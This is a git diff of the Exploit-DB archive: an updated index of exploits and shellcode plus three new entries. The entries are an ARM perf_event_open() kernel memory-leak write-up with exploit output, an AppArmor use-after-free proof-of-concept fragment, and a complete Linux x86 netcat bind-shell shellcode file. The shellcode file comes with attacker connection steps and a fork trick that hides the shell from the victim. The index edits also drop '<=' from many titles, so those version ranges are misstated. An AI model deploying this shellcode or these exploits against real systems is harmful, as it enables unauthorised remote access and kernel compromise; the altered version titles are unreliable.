39644,platforms/multiple/dos/39644.txt,"Wireshark - dissect_pktc_rekey Heap-based Out-of-Bounds Read",2016-03-31,"Google Security Research",multiple,dos,0 -39645,platforms/multiple/remote/39645.php,"PHP <= 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 +39645,platforms/multiple/remote/39645.php,"PHP 5.5.33 / <= 7.0.4 - SNMP Format String Exploit",2016-04-01,"Andrew Kramer",multiple,remote,0 39646,platforms/php/webapps/39646.py,"WordPress Advanced Video Plugin 1.0 - Local File Inclusion (LFI)",2016-04-01,"evait security GmbH",php,webapps,80 39647,platforms/windows/dos/39647.txt,"Windows Kernel - Bitmap Use-After-Free",2016-04-01,"Nils Sommer",windows,dos,0 39648,platforms/windows/dos/39648.txt,"Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0 @@ -35871,7 +35871,7 @@ id,file,description,date,author,platform,type,port 39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0 -39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0 +39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0 40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 @@ -35886,7 +35886,7 @@ id,file,description,date,author,platform,type,port 39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39672,platforms/hardware/webapps/39672.txt,"PLANET Technology IP Surveillance Cameras - Multiple Vulnerabilities",2016-04-07,Orwelllabs,hardware,webapps,443 39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0 -39674,platforms/windows/local/39674.py,"Express Zip <= 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0 +39674,platforms/windows/local/39674.py,"Express Zip 2.40 - Path Traversal",2016-04-08,R-73eN,windows,local,0 39675,platforms/osx/local/39675.c,"Apple Intel HD 3000 Graphics driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",osx,local,0 39676,platforms/php/webapps/39676.txt,"op5 7.1.9 - Remote Command Execution",2016-04-08,hyp3rlinx,php,webapps,443 39677,platforms/hardware/webapps/39677.html,"Hikvision Digital Video Recorder - Cross-Site Request Forgery",2016-04-11,LiquidWorm,hardware,webapps,80 @@ -35905,7 +35905,7 @@ id,file,description,date,author,platform,type,port 39692,platforms/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",linux,local,0 39693,platforms/unix/remote/39693.rb,"Dell KACE K1000 - File Upload",2016-04-13,Metasploit,unix,remote,0 39694,platforms/windows/dos/39694.txt,"Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,dos,0 -39695,platforms/php/webapps/39695.txt,"pfSense Firewall <= 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443 +39695,platforms/php/webapps/39695.txt,"pfSense Firewall 2.2.6 - Services CSRF",2016-04-14,"Aatif Shahdad",php,webapps,443 39696,platforms/hardware/webapps/39696.txt,"Brickcom Corporation Network Cameras - Multiple Vulnerabilities",2016-04-14,Orwelllabs,hardware,webapps,80 39697,platforms/php/webapps/39697.txt,"PHPmongoDB 1.0.0 - Multiple Vulnerabilities",2016-04-14,"Ozer Goker",php,webapps,80 39698,platforms/windows/remote/39698.html,"Internet Explorer 9/10/11 - CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote,0 @@ -35947,7 +35947,7 @@ id,file,description,date,author,platform,type,port 39736,platforms/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote,0 39737,platforms/php/webapps/39737.txt,"ImpressCMS 1.3.9 - SQL Injection",2016-04-26,"Manuel García Cárdenas",php,webapps,80 39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 -39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0 +39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0 39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 @@ -35974,7 +35974,7 @@ id,file,description,date,author,platform,type,port 39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack-Based Overflow",2016-05-04,"Juan Sacco",linux,local,0 39765,platforms/cgi/webapps/39765.txt,"IPFire < 2.19 Core Update 101 - Remote Command Execution",2016-05-04,"Yann CAM",cgi,webapps,0 39766,platforms/php/webapps/39766.php,"PHP Imagick 3.3.0 - disable_functions Bypass",2016-05-04,RicterZ,php,webapps,0 -39767,platforms/multiple/dos/39767.txt,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0 +39767,platforms/multiple/dos/39767.txt,"ImageMagick 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)",2016-05-04,"Nikolay Ermishkin",multiple,dos,0 39768,platforms/multiple/dos/39768.txt,"OpenSSL Padding Oracle in AES-NI CBC MAC Check",2016-05-04,"Juraj Somorovsky",multiple,dos,0 39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0 39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0 @@ -35990,13 +35990,13 @@ id,file,description,date,author,platform,type,port 39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443 39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80 39782,platforms/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,dos,0 -39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0 +39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0 39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80 39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0 39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0 39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0 -39791,platforms/multiple/local/39791.rb,"ImageMagick <= 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 +39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)",2016-05-09,Metasploit,multiple,local,0 39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,Metasploit,ruby,remote,3000 39966,platforms/windows/dos/39966.txt,"Blat 3.2.14 - Stack Overflow",2016-06-16,Vishnu,windows,dos,0 39794,platforms/windows/shellcode/39794.c,"Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)",2016-05-10,Fugu,windows,shellcode,0 @@ -36195,7 +36195,7 @@ id,file,description,date,author,platform,type,port 39994,platforms/windows/dos/39994.html,"Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0 39995,platforms/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE",2016-06-21,ERPScan,java,webapps,0 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0 -39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80 +39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent XSS",2016-06-21,"David Silveiro",ruby,webapps,80 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent XSS",2016-06-21,"David Silveiro",php,webapps,80 40111,platforms/php/webapps/40111.txt,"Joomla Guru Pro (com_guru) Component - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 @@ -36273,14 +36273,18 @@ id,file,description,date,author,platform,type,port 40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 +40183,platforms/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 -40113,platforms/linux/remote/40113.txt,"OpenSSHD <= 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 +40113,platforms/linux/remote/40113.txt,"OpenSSHD 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Persistent XSS in AdminCP/ApiLog via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - SQLi in breadcrumbs via xmlrpc API (Post-Auth)",2014-10-12,tintinweb,php,webapps,0 40118,platforms/windows/local/40118.txt,"Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 -40119,platforms/linux/remote/40119.md,"DropBearSSHD <= 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 +40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution and Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 +40182,platforms/arm/dos/40182.txt,"Linux ARM/ARM64 - perf_event_open() Arbitrary Memory Read",2016-07-29,"Google Security Research",arm,dos,0 +40181,platforms/linux/dos/40181.c,"AppArmor securityfs < 4.8 - aa_fs_seq_hash_show Reference Count Leak",2016-07-29,"Google Security Research",linux,dos,0 +40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - Authenticated Remote Command Execution via devtools Vector",2016-07-29,Orwelllabs,linux,webapps,80 40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)",2016-07-19,CripSlick,lin_x86-64,shellcode,0 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Exploit",2016-07-19,bashis,multiple,remote,0 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 @@ -36293,13 +36297,13 @@ id,file,description,date,author,platform,type,port 40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin CSRF",2016-07-20,LiquidWorm,multiple,webapps,8088 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple XSS",2016-07-20,LiquidWorm,multiple,webapps,8088 -40136,platforms/linux/remote/40136.py,"OpenSSHD <= 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 +40136,platforms/linux/remote/40136.py,"OpenSSHD 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow Exploit (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,CripSlick,lin_x86-64,shellcode,0 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 -40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP <= 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 +40142,platforms/php/remote/40142.php,"Apache 2.4.7 & PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 @@ -36322,3 +36326,14 @@ id,file,description,date,author,platform,type,port 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 40169,platforms/linux/local/40169.txt,"VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 +40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 +40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 +40174,platforms/php/webapps/40174.txt,"Wordpress Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 +40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 +40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post Auth Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 +40178,platforms/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - SEH Overflow (Egghunter)",2016-07-29,ch3rn0byl,windows,remote,80 +40179,platforms/lin_x86/shellcode/40179.c,"Linux/x86 - NetCat Bind Shell with Port (44_ 52 bytes)",2016-07-29,CripSlick,lin_x86,shellcode,0 +40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7_ 3.8 SP1 (3.81)_ and 3.8 SP2 (3.82) - hotfix_upload.cgi filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 +40184,platforms/multiple/dos/40184.html,"WebKit - TypedArray.copyWithin Memory Corruption",2016-07-29,"Google Security Research",multiple,dos,0 +40185,platforms/php/webapps/40185.py,"PhpMyAdmin 4.6.2 - Post-Auth Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 diff --git a/platforms/arm/dos/40182.txt b/platforms/arm/dos/40182.txt new file mode 100755 index 000000000..54c544056 --- /dev/null +++ b/platforms/arm/dos/40182.txt @@ -0,0 +1,82 @@ +perf_event_open() offers to collect various pieces of information when an event occurs, including a user stack backtrace (PERF_SAMPLE_CALLCHAIN). To collect a user stack backtrace, the kernel grabs the userland register state (if the event occured in kernelspace: the userland register state that was recorded on syscall entry), then walks the stackframes by following framepointers. + +On ARM, the step from one stackframe to the next one is implemented in arch/arm/kernel/perf_callchain.c as follows: + +/* + * Get the return address for a single stackframe and return a pointer to the + * next frame tail. + */ +static struct frame_tail __user * +user_backtrace(struct frame_tail __user *tail, + struct perf_callchain_entry *entry) +{ + struct frame_tail buftail; + unsigned long err; + + if (!access_ok(VERIFY_READ, tail, sizeof(buftail))) + return NULL; + + pagefault_disable(); + err = __copy_from_user_inatomic(&buftail, tail, sizeof(buftail)); + pagefault_enable(); + + if (err) + return NULL; + + perf_callchain_store(entry, buftail.lr); + + /* + * Frame pointers should strictly progress back up the stack + * (towards higher addresses). + */ + if (tail + 1 >= buftail.fp) + return NULL; + + return buftail.fp - 1; +} + +The access_ok() check is intended to prevent a malicious userland process from abusing the perf_event_open() API to leak kernelspace data. However, access_ok() does not actually check anything in set_fs(KERNEL_DS) sections, and performance events can occur in pretty much any context. Therefore, by causing a performance event to fire while e.g. the splice() syscall is running under KERNEL_DS, an attacker can circumvent this protection. + +(The "tail + 1 >= buftail.fp" check has no relevance for an attacker; kernelspace addresses are higher than userspace addresses.) + +After circumventing the protection, the attacker can set up a stackframe whose frame pointer points to an arbitrary kernelspace address. The kernel will follow that frame pointer, read the "saved link register" through it and make the result accessible to userspace. Therefore, this vulnerability can be used to read arbitrary kernelspace data. + +The attached exploit can be used to leak 4 bytes at an arbitrary address, like this (tested on a Nexus 6, which runs a kernel based on upstream version 3.10, with a userdebug build that allows the shell user to get a root shell using "su"): + +shell@shamu:/ $ su +root@shamu:/ # echo 0 > /proc/sys/kernel/kptr_restrict +root@shamu:/ # grep max_lock_depth /proc/kallsyms +c1042dc0 D max_lock_depth +root@shamu:/ # exit +shell@shamu:/ $ cat /proc/sys/kernel/max_lock_depth +1025 +shell@shamu:/ $ /data/local/tmp/poc 0xc1042dc0 +attempting to leak 0xc1042dc0 +fake stackframe: fp=0xbeafd920 +data_head is at e8 +SUCCESS: 0x00000401 +SUCCESS: 0x00000401 +shell@shamu:/ $ su +root@shamu:/ # echo 4100 > /proc/sys/kernel/max_lock_depth +root@shamu:/ # exit +shell@shamu:/ $ /data/local/tmp/poc 0xc1042dc0 +attempting to leak 0xc1042dc0 +fake stackframe: fp=0xbecbd920 +data_head is at e8 +SUCCESS: 0x00001004 +SUCCESS: 0x00001004 + +(The number behind the "SUCCESS: " message is the leaked value.) + +On recent kernels, the issue could be attacked more reliably using software events or tracepoints - however, before commit b3eac026 (first contained in Linux 4.2), there is no implementation of perf_arch_fetch_caller_regs() on ARM, making it impossible to exploit the issue that way. + +The arm64 implementation seems to have the same issues as the arm implementation. The x86 code also looks dodgy and has an access_ok() check, but can't be exploited this way because of the valid_user_frame() check that occurs directly after the values have been read through the potentially-kernelspace pointer. + +Regarding other architectures (which I haven't looked into in much detail because they seem less important): Interestingly, sparc already has a safe implementation that explicitly uses set_fs(USER_DS) to make access_ok() safe. tile doesn't seem to even make an effort to differentiate between kernelspace and userspace stacks at a first glance. xtensa has some code, but it looks dodgy. metag also has the bad access_ok() check, but does some sanity checking afterwards that makes it harder to attack. The powerpc code looks secure. + +I have attached a completely untested patch that should fix the x86, arm and arm64 code. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40182.zip + diff --git a/platforms/lin_x86/shellcode/40179.c b/platforms/lin_x86/shellcode/40179.c new file mode 100755 index 000000000..e270d38e4 --- /dev/null +++ b/platforms/lin_x86/shellcode/40179.c @@ -0,0 +1,130 @@ +#include +#include +#include //| needed for C "fork" +#include //| needed for C "system" + + +//| Exploit Title: [Linux x86 NetCat bind shell with Port (44, 52 bytes)] +//| Date: [7/28/2016] +//| Exploit Author: [CripSlick] +//| Tested on: [Kali 2.0 x86] +//| Version: [NetCat v1.10-41] + +//| ShepherdDowling@gmail.com +//| OffSec ID: OS-20614 +//| http://50.112.22.183/ + + +//|===================================================================================================== +//|================================ CripSlick's Short NetCat Bind Shell ================================ +//| +//| +//| Why use CripSlick's NetCat Bind Shell? +//| Because it is short and that is about the only reason. If you can spare some bytes, I highly +//| suggest that you go with my Ncat Bind Shell that has the added benefits of SSL, persistent, +//| multi-terminal with a password >>>>>>>>>>>>>> https://www.exploit-db.com/exploits/40061/ +//| Or if you must only rely on syscalls, go >>>> https://www.exploit-db.com/exploits/40122/ +//| for my bind shell that is also, persistent, multiterminal with a password (Ncat is better +//| due to SSL, so if you know the victim has it on their machine use it.) +//| +//| +//| Sometimes we don't have the luxury of being able to have the other goodies so you must make do +//| with a less powerful approach to at least get your foot in the door, and that is why I made this. +//| +//| Defender Bash Script +//| netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp" +//| +//| I came up with this bash script because I wanted to be able to see who was spying that included +//| TCP listening, TCP established, UDP listening, & UDP established. +//| I found it annoying that some people needed to run a new script for every state so I fixed that. +//| the "-A 50" means your bash script will hold up to 50 connections. +//| If you need more connections increase the number, and if the scan is slow, decrease the number. + + + + +#define PORT "\x39\x38" // FORWARD BYTE ORDER (ASCII TO HEX) +//| PORT:98 + +//| Specifying the PROTOCOL Only Applies to CODE2 +//#define PROTOCOL "\x76\x76" // TCP & IS terminal visible +#define PROTOCOL "\x75\x75" // UDP & NOT terminal visible + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================ +//| ============================================================================== +//| CODE1 Random Port, real ghetto but only 44 bytes!! +//| ============================================================================== +//| Attacker Finds Port: nmap 10.1.1.4 -p- +//| Attacker Connects via TCP: nc +//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp" + + +unsigned char CODE1[] = //replace CODE1 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< + +"\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d" +"\x6c\x76\x76\x89\xe6\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89" +"\xe3\x50\x56\x53\x89\xe1\xb0\x0b\xcd\x80" +; + + +//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================ +//| ============================================================================== +//| CODE2 with port and still only 52 bytes +//| ============================================================================== +//| Attacker Connects via TCP: nc +//| Attacker Connects via UDP: nc -u +//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp" + + +unsigned char CODE2[] = //replace CODE2 for both CODEX <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< + + +"\x31\xdb\xf7\xe3\x68\x2d\x70"PORT"\x89\xe7\x50\x68\x6e\x2f\x73\x68\x68" +"\x65\x2f\x62\x69\x68\x2d\x6c"PROTOCOL"\x89\xe6\x50\x68\x2f\x2f\x6e\x63" +"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80" +; + + + +//|========================== VOID SHELLCODE ====================================== +void SHELLCODE() +{ +// This part floods the registers to make sure the shellcode will always run + __asm__("mov $0xAAAAAAAA, %eax\n\t" + "mov %eax, %ebx\n\t" "mov %eax, %ecx\n\t" "mov %eax, %edx\n\t" + "mov %eax, %esi\n\t" "mov %eax, %edi\n\t" "mov %eax, %ebp\n\t" + "call CODE2"); //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + +//|========================== VOID printBytes ===================================== +void printBytes() +{ +printf("CripSlick's code is %d Bytes Long\n", + strlen(CODE2)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><> +} + + +//|============================== Int main ======================================== +int main () +{ + +// IMPORTANT> replace CODEX the "unsigned char" variable above +// > This needs to be done twice (for string count + code to use) + +int pid = fork(); // fork start + if(pid == 0){ // pid always starts at 0 + + SHELLCODE(); // launch void SHELLCODE + // this is to represent a scenario where you bind to a good program + // you always want your shellcode to run first + + }else if(pid > 0){ // pid will always be greater than 0 after the 1st process + // this argument will always be satisfied + + printBytes(); // launch printBYTES + // pretend that this is the one the victim thinks he is only using + } +return 0; // satisfy int main +system("exit"); // keeps our shellcode a daemon. This only works with C0DE2 as UDP +} + diff --git a/platforms/linux/dos/40181.c b/platforms/linux/dos/40181.c new file mode 100755 index 000000000..d2380bea2 --- /dev/null +++ b/platforms/linux/dos/40181.c @@ -0,0 +1,120 @@ +/* +There's a reference count leak in aa_fs_seq_hash_show that can be used to overflow the reference counter and trigger a kernel use-after-free + +static int aa_fs_seq_hash_show(struct seq_file *seq, void *v) +{ + struct aa_replacedby *r = seq->private; + struct aa_profile *profile = aa_get_profile_rcu(&r->profile); // <--- takes a reference on profile + unsigned int i, size = aa_hash_size(); + + if (profile->hash) { + for (i = 0; i < size; i++) + seq_printf(seq, "%.2x", profile->hash[i]); + seq_puts(seq, "\n"); + } + + return 0; +} // <-- no reference dropped + +See attached for a PoC that triggers a use-after-free on an aa_label object on Ubuntu 15.10 with the latest 4.2.0.35 kernel; the Ubuntu kernel appears to use an older version of AppArmor prior to some refactoring, but the same issue is present. + +static int aa_fs_seq_hash_show(struct seq_file *seq, void *v) +{ + struct aa_replacedby *r = seq->private; + struct aa_label *label = aa_get_label_rcu(&r->label); // <--- takes a reference on label + struct aa_profile *profile = labels_profile(label); + unsigned int i, size = aa_hash_size(); + + if (profile->hash) { + for (i = 0; i < size; i++) + seq_printf(seq, "%.2x", profile->hash[i]); + seq_puts(seq, "\n"); + } + + return 0; +} // <--- no reference dropped + +I noticed in reproducing this issue that it appears that there has been a patch applied to the very latest Ubuntu kernel shipped in 16.04 that fixes this that hasn't been upstreamed or backported. + +The fix is just to correctly drop the acquired reference. + +index ad4fa49..798d492 100644 +--- a/security/apparmor/apparmorfs.c ++++ b/security/apparmor/apparmorfs.c +@@ -331,6 +331,7 @@ static int aa_fs_seq_hash_show(struct seq_file *seq, void *v) + seq_printf(seq, "%.2x", profile->hash[i]); + seq_puts(seq, "\n"); + } ++ aa_put_profile(profile); + + return 0; + } +*/ + +#include +#include + +#include + +#include +#include +#include +#include + +#include + +#define BASE_PATH "/sys/kernel/security/apparmor/policy/profiles/sbin.dhclient.2" +#define HASH_PATH BASE_PATH "/sha1" + +void add_references(int hash_fd, int refs_to_add) { + char buf[1]; + for (int i = 0; i < refs_to_add; ++i) { + pread(hash_fd, buf, sizeof(buf), 0); + } +} + 